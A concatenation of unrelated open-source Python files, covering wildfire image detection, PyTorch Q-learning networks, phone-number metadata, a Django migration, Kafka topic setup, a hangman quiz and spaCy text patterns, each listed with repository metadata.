settings, getArchivedImages.tmpDir.name, constants['camArchives'], cameraID, prevTimeDT, timeDT, minusMinutes or 1) # logging.warning('files %s', str(files)) if not files: return (None, None, None, None) if minusMinutes: if len(files) > 1: if files[0] >= files[1]: # files[0] is supposed to be earlier than files[1] logging.warning('unexpected file order %s', str(files)) for file in files: os.remove(file) return (None, None, None, None) imgDiffPath = genDiffImage(files[1], files[0], minusMinutes) os.remove(files[0]) # no longer needed parsedName = img_archive.parseFilename(files[1]) return (cameraID, parsedName['unixTime'], files[1], imgDiffPath) else: logging.warning('unexpected file count %s', str(files)) for file in files: os.remove(file) return (None, None, None, None) elif len(files) > 0: parsedName = img_archive.parseFilename(files[0]) return (cameraID, parsedName['unixTime'], files[0], files[0]) return (None, None, None, None) getArchivedImages.tmpDir = None def main(): optArgs = [ ["b", "heartbeat", "filename used for heartbeating check"], ["c", "collectPositves", "collect positive segments for training data"], ["d", "imgDirectory", "Name of the directory containing the images"], ["t", "time", "Time breakdown for processing images"], ["m", "minusMinutes", "(optional) subtract images from given number of minutes ago"], ["r", "restrictType", "Only process images from cameras of given type"], ["s", "startTime", "(optional) performs search with modifiedTime > startTime"], ["e", "endTime", "(optional) performs search with modifiedTime < endTime"], ] args = collect_args.collectArgs([], optionalArgs=optArgs, parentParsers=[goog_helper.getParentParser()]) minusMinutes = int(args.minusMinutes) if args.minusMinutes else 0 googleServices = goog_helper.getGoogleServices(settings, args) dbManager = db_manager.DbManager(sqliteFile=settings.db_file, psqlHost=settings.psqlHost, psqlDb=settings.psqlDb, psqlUser=settings.psqlUser, psqlPasswd=settings.psqlPasswd) tfConfig = tf.ConfigProto() tfConfig.gpu_options.per_process_gpu_memory_fraction = 0.1 #hopefully reduces segfaults cameras = dbManager.get_sources(activeOnly=True, restrictType=args.restrictType) startTimeDT = dateutil.parser.parse(args.startTime) if args.startTime else None endTimeDT = dateutil.parser.parse(args.endTime) if args.endTime else None timeRangeSeconds = None useArchivedImages = False camArchives = img_archive.getHpwrenCameraArchives(googleServices['sheet'], settings) DetectionPolicyClass = policies.get_policies()[settings.detectionPolicy] detectionPolicy = DetectionPolicyClass(settings, args, googleServices, dbManager, tfConfig, camArchives, minusMinutes, useArchivedImages) constants = { # dictionary of constants to reduce parameters in various functions 'args': args, 'googleServices': googleServices, 'camArchives': camArchives, 'dbManager': dbManager, } if startTimeDT or endTimeDT: assert startTimeDT and endTimeDT timeRangeSeconds = (endTimeDT-startTimeDT).total_seconds() assert timeRangeSeconds > 0 assert args.collectPositves useArchivedImages = True random.seed(0) # fixed seed guarantees same randomized ordering. Should make this optional argument in future processingTimeTracker = initializeTimeTracker() while True: classifyImgPath = None timeStart = time.time() if useArchivedImages: (cameraID, timestamp, imgPath, classifyImgPath) = \ getArchivedImages(constants, cameras, startTimeDT, timeRangeSeconds, minusMinutes) # elif minusMinutes: to be resurrected using archive functionality # elif args.imgDirectory: unused functionality -- to delete? # (cameraID, timestamp, imgPath, md5) = getNextImageFromDir(args.imgDirectory) else: # regular (non diff mode), grab image and process (cameraID, timestamp, imgPath, md5) = getNextImage(dbManager, cameras) classifyImgPath = imgPath if not cameraID: continue # skip to next camera timeFetch = time.time() image_spec = [{}] image_spec[-1]['path'] = classifyImgPath image_spec[-1]['timestamp'] = timestamp image_spec[-1]['cameraID'] = cameraID detectionResult = detectionPolicy.detect(image_spec) timeDetect = time.time() if detectionResult['fireSegment']: if checkAndUpdateAlerts(dbManager, cameraID, timestamp, detectionResult['driveFileIDs']): alertFire(constants, cameraID, imgPath, detectionResult['annotatedFile'], detectionResult['driveFileIDs'], detectionResult['fireSegment'], timestamp) deleteImageFiles(imgPath, imgPath, detectionResult['annotatedFile']) if (args.heartbeat): heartBeat(args.heartbeat) timePost = time.time() updateTimeTracker(processingTimeTracker, timePost - timeStart) if args.time: if not detectionResult['timeMid']: detectionResult['timeMid'] = timeDetect logging.warning('Timings: fetch=%.2f, detect0=%.2f, detect1=%.2f post=%.2f', timeFetch-timeStart, detectionResult['timeMid']-timeFetch, timeDetect-detectionResult['timeMid'], timePost-timeDetect) if __name__=="__main__": main()
1.820313
2
torch_agents/cogment_verse_torch_agents/third_party/hive/mlp.py
kharyal/cogment-verse
0
11044
import math import numpy as np import torch import torch.nn.functional as F from torch import nn class SimpleMLP(nn.Module): """Simple MLP function approximator for Q-Learning.""" def __init__(self, in_dim, out_dim, hidden_units=256, num_hidden_layers=1): super().__init__() self.input_layer = nn.Sequential(nn.Linear(in_dim, hidden_units), nn.ReLU()) self.hidden_layers = nn.Sequential( *[nn.Sequential(nn.Linear(hidden_units, hidden_units), nn.ReLU()) for _ in range(num_hidden_layers - 1)] ) self.output_layer = nn.Linear(hidden_units, out_dim) def forward(self, x): x = self.input_layer(x) x = self.hidden_layers(x) return self.output_layer(x) class NoisyLinear(nn.Module): """NoisyLinear Layer""" def __init__(self, in_dim, out_dim, std_init=0.4): super(NoisyLinear, self).__init__() self.in_features = in_dim self.out_features = out_dim self.std_init = std_init self.weight_mu = nn.Parameter(torch.empty(out_dim, in_dim)) self.weight_sigma = nn.Parameter(torch.empty(out_dim, in_dim)) self.register_buffer("weight_epsilon", torch.empty(out_dim, in_dim)) self.bias_mu = nn.Parameter(torch.empty(out_dim)) self.bias_sigma = nn.Parameter(torch.empty(out_dim)) self.register_buffer("bias_epsilon", torch.empty(out_dim)) self.reset_parameters() self.sample_noise() def reset_parameters(self): mu_range = 1.0 / math.sqrt(self.in_features) self.weight_mu.data.uniform_(-mu_range, mu_range) self.weight_sigma.data.fill_(self.std_init / math.sqrt(self.in_features)) self.bias_mu.data.uniform_(-mu_range, mu_range) self.bias_sigma.data.fill_(self.std_init / math.sqrt(self.out_features)) def _scale_noise(self, size): x = torch.randn(size) return x.sign().mul_(x.abs().sqrt_()) def sample_noise(self): epsilon_in = self._scale_noise(self.in_features) epsilon_out = self._scale_noise(self.out_features) weight_eps = epsilon_out.ger(epsilon_in) bias_eps = epsilon_out return weight_eps, bias_eps def forward(self, inp): if self.training: weight_eps, bias_eps = self.sample_noise() return F.linear( inp, self.weight_mu + self.weight_sigma * weight_eps, self.bias_mu + self.bias_sigma * bias_eps, ) else: return F.linear(inp, self.weight_mu, self.bias_mu) class ComplexMLP(nn.Module): """MLP function approximator for Q-Learning.""" def __init__( self, in_dim, out_dim, hidden_units=256, num_hidden_layers=1, noisy=False, dueling=False, sigma_init=0.5, atoms=1, ): super().__init__() self._noisy = noisy self._dueling = dueling self._sigma_init = sigma_init self._in_dim = np.prod(in_dim) self._hidden_units = hidden_units if self._dueling: num_hidden_layers = max(num_hidden_layers - 1, 2) self._num_hidden_layers = num_hidden_layers self._out_dim = out_dim self._atoms = atoms self.init_networks() def init_networks(self): if self._noisy: self.input_layer = nn.Sequential( NoisyLinear(self._in_dim, self._hidden_units, self._sigma_init), nn.ReLU(), ) self.hidden_layers = nn.Sequential( *[ nn.Sequential( NoisyLinear(self._hidden_units, self._hidden_units, self._sigma_init), nn.ReLU(), ) for _ in range(self._num_hidden_layers - 1) ] ) else: self.input_layer = nn.Sequential(nn.Linear(self._in_dim, self._hidden_units), nn.ReLU()) self.hidden_layers = nn.Sequential( *[ nn.Sequential(nn.Linear(self._hidden_units, self._hidden_units), nn.ReLU()) for _ in range(self._num_hidden_layers - 1) ] ) if self._dueling: """In dueling, we have two heads - one for estimating advantage function and one for estimating value function. If `noisy` is also true, then each of these layers will be NoisyLinear()""" if self._noisy: self.output_layer_adv = nn.Sequential( NoisyLinear(self._hidden_units, self._hidden_units, self._sigma_init), nn.ReLU(), NoisyLinear( self._hidden_units, self._out_dim * self._atoms, self._sigma_init, ), ) self.output_layer_val = nn.Sequential( NoisyLinear(self._hidden_units, self._hidden_units, self._sigma_init), nn.ReLU(), NoisyLinear( self._hidden_units, 1 * self._atoms, self._sigma_init, ), ) else: self.output_layer_adv = nn.Sequential( nn.Linear(self._hidden_units, self._hidden_units, self._sigma_init), nn.ReLU(), nn.Linear( self._hidden_units, self._out_dim * self._atoms, self._sigma_init, ), ) self.output_layer_val = nn.Sequential( nn.Linear(self._hidden_units, self._hidden_units, self._sigma_init), nn.ReLU(), nn.Linear( self._hidden_units, 1 * self._atoms, self._sigma_init, ), ) else: if self._noisy: self.output_layer = NoisyLinear(self._hidden_units, self._out_dim * self._atoms, self._sigma_init) else: self.output_layer = nn.Linear(self._hidden_units, self._out_dim * self._atoms) def forward(self, x): x = torch.flatten(x, start_dim=1) x = self.input_layer(x) x = self.hidden_layers(x) if self._dueling: adv = self.output_layer_adv(x) val = self.output_layer_val(x) if len(adv.shape) == 1: x = val + adv - adv.mean(0) else: x = val + adv - adv.mean(1).unsqueeze(1).expand(x.shape[0], self._out_dim) else: x = self.output_layer(x) return x class DistributionalMLP(ComplexMLP): """Distributional MLP function approximator for Q-Learning.""" def __init__( self, in_dim, out_dim, supports, hidden_units=256, num_hidden_layers=1, noisy=True, dueling=True, sigma_init=0.5, atoms=51, ): super().__init__( in_dim, out_dim, hidden_units, num_hidden_layers, noisy, dueling, sigma_init, atoms, ) self._supports = supports def forward(self, x): x = torch.flatten(x, start_dim=1) x = self.dist(x) x = torch.sum(x * self._supports, dim=2) return x def dist(self, x): x = self.input_layer(x) x = self.hidden_layers(x) if self._dueling: adv = self.output_layer_adv(x) adv = adv.view(-1, self._out_dim, self._atoms) val = self.output_layer_val(x) val = val.view(-1, 1, self._atoms) x = val + adv - adv.mean(dim=1, keepdim=True) else: x = self.output_layer(x) x = x.view(-1, self._out_dim, self._atoms) x = F.softmax(x, dim=-1) x = x.clamp(min=1e-3) return x
2.859375
3
phonenumbers/data/region_AC.py
ayushgoel/FixGoogleContacts
2
11045
"""Auto-generated file, do not edit by hand. AC metadata""" from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata PHONE_METADATA_AC = PhoneMetadata(id='AC', country_code=247, international_prefix='00', general_desc=PhoneNumberDesc(national_number_pattern='[2-467]\\d{3}', possible_number_pattern='\\d{4}'), fixed_line=PhoneNumberDesc(national_number_pattern='(?:[267]\\d|3[0-5]|4[4-69])\\d{2}', possible_number_pattern='\\d{4}', example_number='6889'), mobile=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'), toll_free=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'), premium_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'), shared_cost=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'), personal_number=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'), voip=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'), pager=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'), uan=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'), emergency=PhoneNumberDesc(national_number_pattern='911', possible_number_pattern='\\d{3}', example_number='911'), voicemail=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'), short_code=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'), standard_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'), no_international_dialling=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'))
1.882813
2
awx/main/migrations/0156_capture_mesh_topology.py
ziegenberg/awx
1
11046
<reponame>ziegenberg/awx # Generated by Django 2.2.20 on 2021-12-17 19:26 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('main', '0155_improved_health_check'), ] operations = [ migrations.AlterField( model_name='instance', name='node_type', field=models.CharField( choices=[ ('control', 'Control plane node'), ('execution', 'Execution plane node'), ('hybrid', 'Controller and execution'), ('hop', 'Message-passing node, no execution capability'), ], default='hybrid', max_length=16, ), ), migrations.CreateModel( name='InstanceLink', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('source', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='main.Instance')), ('target', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reverse_peers', to='main.Instance')), ], options={ 'unique_together': {('source', 'target')}, }, ), migrations.AddField( model_name='instance', name='peers', field=models.ManyToManyField(through='main.InstanceLink', to='main.Instance'), ), ]
1.75
2
models/dsd/bicubic.py
VinAIResearch/blur-kernel-space-exploring
93
11047
import torch from torch import nn from torch.nn import functional as F class BicubicDownSample(nn.Module): def bicubic_kernel(self, x, a=-0.50): """ This equation is exactly copied from the website below: https://clouard.users.greyc.fr/Pantheon/experiments/rescaling/index-en.html#bicubic """ abs_x = torch.abs(x) if abs_x <= 1.0: return (a + 2.0) * torch.pow(abs_x, 3.0) - (a + 3.0) * torch.pow(abs_x, 2.0) + 1 elif 1.0 < abs_x < 2.0: return a * torch.pow(abs_x, 3) - 5.0 * a * torch.pow(abs_x, 2.0) + 8.0 * a * abs_x - 4.0 * a else: return 0.0 def __init__(self, factor=4, cuda=True, padding="reflect"): super().__init__() self.factor = factor size = factor * 4 k = torch.tensor( [self.bicubic_kernel((i - torch.floor(torch.tensor(size / 2)) + 0.5) / factor) for i in range(size)], dtype=torch.float32, ) k = k / torch.sum(k) # k = torch.einsum('i,j->ij', (k, k)) k1 = torch.reshape(k, shape=(1, 1, size, 1)) self.k1 = torch.cat([k1, k1, k1], dim=0) k2 = torch.reshape(k, shape=(1, 1, 1, size)) self.k2 = torch.cat([k2, k2, k2], dim=0) self.cuda = ".cuda" if cuda else "" self.padding = padding for param in self.parameters(): param.requires_grad = False def forward(self, x, nhwc=False, clip_round=False, byte_output=False): # x = torch.from_numpy(x).type('torch.FloatTensor') filter_height = self.factor * 4 filter_width = self.factor * 4 stride = self.factor pad_along_height = max(filter_height - stride, 0) pad_along_width = max(filter_width - stride, 0) filters1 = self.k1.type("torch{}.FloatTensor".format(self.cuda)) filters2 = self.k2.type("torch{}.FloatTensor".format(self.cuda)) # compute actual padding values for each side pad_top = pad_along_height // 2 pad_bottom = pad_along_height - pad_top pad_left = pad_along_width // 2 pad_right = pad_along_width - pad_left # apply mirror padding if nhwc: x = torch.transpose(torch.transpose(x, 2, 3), 1, 2) # NHWC to NCHW # downscaling performed by 1-d convolution x = F.pad(x, (0, 0, pad_top, pad_bottom), self.padding) x = F.conv2d(input=x, weight=filters1, stride=(stride, 1), groups=3) if clip_round: x = torch.clamp(torch.round(x), 0.0, 255.0) x = F.pad(x, (pad_left, pad_right, 0, 0), self.padding) x = F.conv2d(input=x, weight=filters2, stride=(1, stride), groups=3) if clip_round: x = torch.clamp(torch.round(x), 0.0, 255.0) if nhwc: x = torch.transpose(torch.transpose(x, 1, 3), 1, 2) if byte_output: return x.type("torch.{}.ByteTensor".format(self.cuda)) else: return x
2.703125
3
control/webapp/__init__.py
doismellburning/control-panel
1
11048
<gh_stars>1-10 import logging from flask import Flask from . import utils, home, member, society, signup, jobs, admin from .flask_seasurf import SeaSurf from flask_talisman import Talisman app = Flask(__name__, template_folder="../templates", static_folder="../static") app.config['CSRF_CHECK_REFERER'] = False csrf = SeaSurf(app) Talisman(app) logging.basicConfig(level=logging.DEBUG if app.debug else logging.INFO) utils.setup_app(app) app.register_blueprint(home.bp) app.register_blueprint(member.bp) app.register_blueprint(society.bp) app.register_blueprint(signup.bp) app.register_blueprint(jobs.bp) app.register_blueprint(admin.bp)
1.851563
2
tests/rules/test_duplicates.py
imbillu/arche
1
11049
<gh_stars>1-10 import arche.rules.duplicates as duplicates from arche.rules.result import Level, Outcome from conftest import create_result import numpy as np import pandas as pd import pytest unique_inputs = [ ({}, {}, {Level.INFO: [(Outcome.SKIPPED,)]}), ( {"id": ["0", "0", "1"]}, {"unique": ["id"]}, { Level.ERROR: [ ("id contains 1 duplicated value(s)", None, {"same '0' `id`": [0, 1]}) ] }, ), ( { "id": ["47" for x in range(6)], "name": ["Walt", "Juan", "Juan", "Walt", "Walt", "John"], }, {"unique": ["id", "name"]}, { Level.ERROR: [ ( "id contains 1 duplicated value(s)", None, {"same '47' `id`": [i for i in range(6)]}, ), ( "name contains 2 duplicated value(s)", None, {"same 'Juan' `name`": [1, 2], "same 'Walt' `name`": [0, 3, 4]}, ), ] }, ), ({"name": ["a", "b"]}, {"unique": ["name"]}, {}), ] @pytest.mark.parametrize("data, tagged_fields, expected_messages", unique_inputs) def test_find_by_unique(data, tagged_fields, expected_messages): df = pd.DataFrame(data) assert duplicates.find_by_unique(df, tagged_fields) == create_result( "Duplicates By **unique** Tag", expected_messages, items_count=len(df) ) @pytest.mark.parametrize( "data, columns, expected_messages", [ ( {"id": ["0", "0", "1"]}, ["id"], { Level.ERROR: [ ("2 duplicate(s) with same id", None, {"same '0' `id`": [0, 1]}) ] }, ), ({"id": ["0", "1", "2"]}, ["id"], {}), ( {"id": [np.nan, "9", "9"], "city": [np.nan, "Talca", "Talca"]}, ["id", "city"], { Level.ERROR: [ ( "2 duplicate(s) with same id, city", None, {"same '9' `id`, 'Talca' `city`": [1, 2]}, ) ] }, ), ], ) def test_find_by(data, columns, expected_messages): df = pd.DataFrame(data) assert duplicates.find_by(df, columns) == create_result( "Duplicates", expected_messages, items_count=len(df) ) @pytest.mark.parametrize( "data, tagged_fields, expected_messages", [ ({}, {}, {Level.INFO: [(Outcome.SKIPPED,)]}), ( {"name": ["bob", "bob", "bob", "bob"], "url": ["u1", "u1", "2", "u1"]}, {"name_field": ["name"], "product_url_field": ["url"]}, { Level.ERROR: [ ( "3 duplicate(s) with same name, url", None, {"same 'bob' `name`, 'u1' `url`": [0, 1, 3]}, ) ] }, ), ( {"name": ["john", "bob"], "url": ["url1", "url1"]}, {"name_field": ["name"], "product_url_field": ["url"]}, {}, ), ], ) def test_find_by_name_url(data, tagged_fields, expected_messages): df = pd.DataFrame(data) result = duplicates.find_by_name_url(df, tagged_fields) assert result == create_result( "Duplicates By **name_field, product_url_field** Tags", expected_messages, items_count=len(df), )
2.453125
2
Question_1.py
Queen-Jonnie/Work
0
11050
# This is the word list from where the answers for the hangman game will come from. word_list = [ 2015, "<NAME>", "Rwanda and Mauritius", 2, "Dr, <NAME>", "<NAME>", "Madagascar", 94, 8, "Mauritius" ] # Here we are defining the variables 'Right'(for when they get the question correct) and \n # 'tries'(for when they get a question wrong). Right = 0 tries = 0 # This function below after called, will greet the user when they input their name. def greet(name): print("Hello " + name + " welcome to hangman and good luck!") user_name = input("What is your name?") greet(user_name) # This functions below when called, will check when guess is returned whether the user's guess is in the word_list\n # or not and will print out the appropriate responses while consecutively adding to the 'Right' or 'tries' variable. def alu(guess): if guess in word_list: print("congrats!") def check(guess): if guess not in word_list: print("Wrong") return guess guess1 = int(input("When was ALU founded?")) if alu(guess1): Right += 1 else: check(guess1) tries += 1 guess2 = input("Who is the CEO of ALU") if alu(guess2): Right += 1 else: check(guess2) tries += 1 guess3 = input("Where are ALU campuses?") if alu(guess3): Right += 1 else: check(guess3) tries += 1 guess4 = int(input("How many campuses does ALU have?")) if alu(guess4): Right += 1 else: check(guess4) tries += 1 guess5 = input("What is the name of ALU Rwanda's Dean?") if alu(guess5): Right += 1 else: check(guess5) tries += 1 guess6 = input("Who is in charge of Student Life?") if alu(guess6): Right += 1 else: check(guess6) tries += 1 if tries == 6: exit("You lost") guess7 = input("What is the name of our Lab?") if alu(guess7): Right += 1 else: check(guess7) tries += 1 if tries == 6: exit("You lost") guess8 = int(input("How many students do we have in Year 2 CS?")) if alu(guess8): Right += 1 else: check(guess8) tries += 1 if tries == 6: exit("You lost") guess9 = int(input("How many degrees does ALU offer?")) if alu(guess9): Right += 1 else: check(guess9) tries += 1 if tries == 6: exit("You lost") guess10 = input("Where are the headquarters of ALU?") if alu(guess10): Right += 1 else: check(guess10) tries += 1 if tries == 6: exit("You lost")
4.28125
4
node-api/get-block-transfers/request.py
Venoox/casper-integrations
5
11051
<reponame>Venoox/casper-integrations import json import os import pycspr # A known casper test-net node address. _NODE_ADDRESS = os.getenv("CASPER_NODE_ADDRESS", "192.168.127.12") # A known block hash. _BLOCK_HASH: bytes = bytes.fromhex("c7148e1e2e115d8fba357e04be2073d721847c982dc70d5c36b5f6d3cf66331c") # A known block height. _BLOCK_HEIGHT: int = 20652 def main(): """Retrieves transfers by block. """ # Set client. client = pycspr.NodeClient(pycspr.NodeConnectionInfo(host=_NODE_ADDRESS)) # Set block by known hash. block_transers_1: tuple = client.queries.get_block_transfers(_BLOCK_HASH) # Set block by known height. block_transers_2: tuple = client.queries.get_block_transfers(_BLOCK_HEIGHT) # Verify block information equivalence. assert block_transers_1 == block_transers_2 print("-----------------------------------------------------------------------------------------------------") print(f"QUERIED TEST-NET NODE {_NODE_ADDRESS}") print("-----------------------------------------------------------------------------------------------------") print(f"Block transfers = {json.dumps(block_transers_1, indent=4)}") print("-----------------------------------------------------------------------------------------------------") if __name__ == "__main__": try: main() except Exception as err: print(f"API ERROR @ NODE {_NODE_ADDRESS} :: {err}")
2.4375
2
tests/test_util.py
re3turn/twicrawler
14
11052
import nose2.tools from typing import Union from app.util import has_attributes class SampleClass: pass class TestUtil: @nose2.tools.params( ('SET_VALUE', True), (None, False), ('NO_ATTRIBUTE', False), (False, True), ('', True), (0, True), ) def test_has_attributes(self, value: Union[bool, int, str, None], ans: bool) -> None: obj = SampleClass() if value != 'NO_ATTRIBUTE': setattr(obj, 'attr', value) has_attr = has_attributes(obj, 'attr') assert has_attr is ans
2.828125
3
commands/data/fusion_data.py
Christ0ph990/Fusion360DevTools
3
11053
# Copyright 2022 by Autodesk, Inc. # Permission to use, copy, modify, and distribute this software in object code form # for any purpose and without fee is hereby granted, provided that the above copyright # notice appears in all copies and that both that copyright notice and the limited # warranty and restricted rights notice below appear in all supporting documentation. # # AUTODESK PROVIDES THIS PROGRAM "AS IS" AND WITH ALL FAULTS. AUTODESK SPECIFICALLY # DISCLAIMS ANY IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. # AUTODESK, INC. DOES NOT WARRANT THAT THE OPERATION OF THE PROGRAM WILL BE # UNINTERRUPTED OR ERROR FREE. from dataclasses import dataclass, field import base64 import pprint import adsk.core app = adsk.core.Application.get() def b64_url_safe_encode(string): encoded_bytes = base64.urlsafe_b64encode(string.encode("utf-8")) encoded_str = str(encoded_bytes, "utf-8") return encoded_str.rstrip("=") def b64_url_safe_decode(string): return str(base64.urlsafe_b64decode(string.lstrip('a.') + "==="), "utf-8") def link_for_url(url: str) -> str: return f"<a href={url}>{url}</a>" @dataclass class FusionData: # This should be set at creation or at least validity checked BEFORE calling this data_file: adsk.core.DataFile = field(repr=False, default=None) # THe following are computed based on current state of Fusion and are not "printed" by default hub: adsk.core.DataHub = field(repr=False, init=False) project: adsk.core.DataProject = field(repr=False, init=False) folder: adsk.core.DataFolder = field(repr=False, init=False) user: adsk.core.User = field(repr=False, init=False) # All String Properties file_name: str = field(init=False) user_email: str = field(init=False) hub_name: str = field(init=False) hub_id: str = field(init=False) hub_id_decoded: str = field(init=False) hub_team_name: str = field(init=False) project_name: str = field(init=False) project_id: str = field(init=False) project_id_decoded: str = field(init=False) folder_name: str = field(init=False) folder_id: str = field(init=False) lineage_urn: str = field(init=False) version_urn: str = field(init=False) base64_lineage_urn: str = field(init=False) base64_version_urn: str = field(init=False) open_from_web: str = field(init=False) fusion_team_url: str = field(init=False) fusion_team_link: str = field(init=False) def __post_init__(self): # THe following are computed based on current state of Fusion and are not "printed" by default self.hub = app.data.activeHub self.project = self.data_file.parentProject self.folder = self.data_file.parentFolder self.user = app.currentUser # All String Properties self.file_name: str = self.data_file.name self.user_email: str = self.user.email self.hub_name: str = self.hub.name self.hub_id: str = self.hub.id self.hub_id_decoded: str = b64_url_safe_decode(self.hub_id) self.hub_team_name: str = self.hub_id_decoded.split(':')[-1] self.project_name: str = self.project.name self.project_id: str = self.project.id self.project_id_decoded: str = b64_url_safe_decode(self.project_id) self.folder_name: str = self.folder.name self.folder_id: str = self.folder.id self.lineage_urn: str = self.data_file.id self.version_urn: str = self.data_file.versionId self.base64_lineage_urn: str = b64_url_safe_encode(self.lineage_urn) self.base64_version_urn: str = b64_url_safe_encode(self.version_urn) team_base_url: str = 'autodesk360' self.open_from_web: str = f"fusion360://userEmail={self.user_email}&" \ f"lineageUrn={self.lineage_urn}&" \ f"hubUrl=https://{self.hub_team_name}.{team_base_url}.com&" \ f"documentName={self.file_name}" self.fusion_team_url: str = f"https://{self.hub_team_name}.{team_base_url}.com/g/data/{self.base64_lineage_urn}" self.fusion_team_link = link_for_url(self.fusion_team_url) def str_dict(self): return {k: v for k, v in self.__dict__.items() if isinstance(v, str)} def pretty_string(self): return pprint.pformat(self.str_dict())
2.015625
2
src/config-producer/config_topic.py
DougFigueroa/realde-kafka-assesment
0
11054
""" This process creates the two kafka topics to be used. The input-topic with ten partitions and the output-topic with one partition. Also preloads the kafka cluster with test data (if flag is set to true). """ import os import time import json import logging from confluent_kafka.admin import AdminClient, NewTopic from confluent_kafka import Producer # defining logger logger = logging.getLogger() logger.setLevel(logging.INFO) # reading the environement variables defined on the docker compose KAFKA_CLUSTER = os.environ.get('KAFKA_CLUSTER_CONNECT', 'localhost:9092') LOAD_DATA = os.environ.get('LOAD_SAMPLE_DATA', False) logging.info( (f'>Env variables: KAFKA_CLUSTER_CONNECT={KAFKA_CLUSTER} ' f'LOAD_SAMPLE_DATA={LOAD_DATA}')) BROKER_CONFIG = {'bootstrap.servers': KAFKA_CLUSTER} def read_json_file(file_route: str) -> dict: """ Read the json configuration file to set topics and partitions. Args: - str, the route(with name) of the configuration file. Returns: - dict, with the configurations defined on the json file. """ with open(file_route, 'r') as f: config = json.load(f) logging.info('JSON file readed.') return config def create_topics(admin: object, config: dict) -> None: """Create the kafka topics based on the configuration file. Args: - object, the admin client kafka object. - dict, json configuration of the process. Returns: None. """ # read the topic configuration and create the NewTopic objects topics = [] for k, v in config.items(): topics.append(NewTopic( v['topic_name'], num_partitions=v['partitions_quantity'], replication_factor=1 ) ) logging.info(f'Starting the creation of the topics: {topics}...') creation_response = admin.create_topics(topics) # the response has futures (which runs asynchronously) so we validate them # to see if they succeeded or not for topic, f in creation_response.items(): try: f.result() logging.info(f'Creation of the topic {topic} completed.') except Exception as e: logger.error(f'Error creating the kafka topic: {topic}. {e}') raise Exception(f'Error creating the kafka topic: {topic}. {e}') def list_topics_and_config(admin: object) -> None: """Check the topics that exists at a specifid. And displays other configs of the Kafka Cluster. Args: - object, the admin client kafka object. Returns: None. """ list_response = admin.list_topics(timeout=5) # get all the broker info logging.info('>Broker details:') for counter, broker in enumerate(list_response.brokers.items(), start=1): logging.info(f'{counter}-Broker info: {broker}') logging.info('>Topics details:') # get all the topic names for counter, topic_data in enumerate(list_response.topics.items(), start=1): logging.info(f'{counter}-Topic info: {topic_data}') def load_sample_data(topic: str, sample_data: list) -> None: """Loads the sample data to the input kafka topic. This will load data across 10 different partitions. Args: - str, the topic name where the data is going to be loaded. - list, the sample data to be loaded by the producer across all the partitions of the specified topic. Returns: None """ producer = Producer(BROKER_CONFIG) # iterate through partitions for data in sample_data: for number in data['values']: try: producer.produce(topic, str(number), None, data['partition']) except Exception as e: logger.error( f'Producer failed to produce a message to the topic. {e}') raise Exception( f'Failed to produce a message from Kakfia. {e}') producer.poll(0) # ensure all the delivery queue has been loaded producer.flush() logging.info('Data successfully produced and loaded to the specify topic.') def main() -> None: """Orchestrates all the process execution. From configuring the cluster topics to load the sample input data. """ configuration_file = 'topic_config.json' data_file = 'sample_data.json' time.sleep(5) actual_path = os.path.dirname(__file__) configuration_path = os.path.join(actual_path, configuration_file) data_path = os.path.join(actual_path, data_file) config = read_json_file(configuration_path) # defining the admin client needed to create topics admin = AdminClient(BROKER_CONFIG) create_topics(admin, config) # this step its only for validation purposes list_topics_and_config(admin) # start the load of the sample data to the input topic if LOAD_DATA: in_topic_name = config['in_topic_conf']['topic_name'] sample_data = read_json_file(data_path) load_sample_data(in_topic_name, sample_data) if __name__ == '__main__': main()
2.734375
3
deallocate/params.py
jefferycwc/tacker-example-plugin
0
11055
OS_MA_NFVO_IP = '192.168.1.197' OS_USER_DOMAIN_NAME = 'Default' OS_USERNAME = 'admin' OS_PASSWORD = '<PASSWORD>' OS_PROJECT_DOMAIN_NAME = 'Default' OS_PROJECT_NAME = 'admin'
1.125
1
anoplura/patterns/body_part.py
rafelafrance/traiter_lice
0
11056
<gh_stars>0 """Extract body part annotations.""" import re import spacy from traiter.const import COMMA from traiter.patterns.matcher_patterns import MatcherPatterns from anoplura.pylib.const import COMMON_PATTERNS from anoplura.pylib.const import CONJ from anoplura.pylib.const import MISSING from anoplura.pylib.const import REPLACE JOINER = CONJ + COMMA JOINER_RE = "|".join(JOINER + [r"\s"]) JOINER_RE = re.compile(rf"\b(?:{JOINER_RE})\b", flags=re.IGNORECASE) MISSING_RE = "|".join([fr"\b{m}\b" for m in MISSING]) MISSING_RE = re.compile(MISSING_RE, flags=re.IGNORECASE) BODY_PART = MatcherPatterns( "body_part", on_match="anoplura.body_part.v1", decoder=COMMON_PATTERNS | { "seg": {"ENT_TYPE": "segmented"}, "ord": {"ENT_TYPE": {"IN": ["ordinal", "number_word"]}}, }, patterns=[ "missing part+", "missing? any_part* part", "part+ &/,/or* part* &/,/or* part+", "part+ ord -? ord", "part+ 99? -? 99", "part+ ord?", "part+ 99?", "part+ ord -? seg", "part+ 99 -? seg", "ord? -? seg? part+", "99 - seg part+", ], ) @spacy.registry.misc(BODY_PART.on_match) def body_part(ent): """Enrich a body part span.""" data = {} parts = JOINER_RE.split(ent.text.lower()) parts = [REPLACE.get(p, p) for p in parts] text = " ".join(parts) text = re.sub(r"\s*-\s*", "-", text) text = REPLACE.get(text, text) if MISSING_RE.search(ent.text.lower()) is not None: data["missing"] = True data["body_part"] = text ent._.data = data
2.375
2
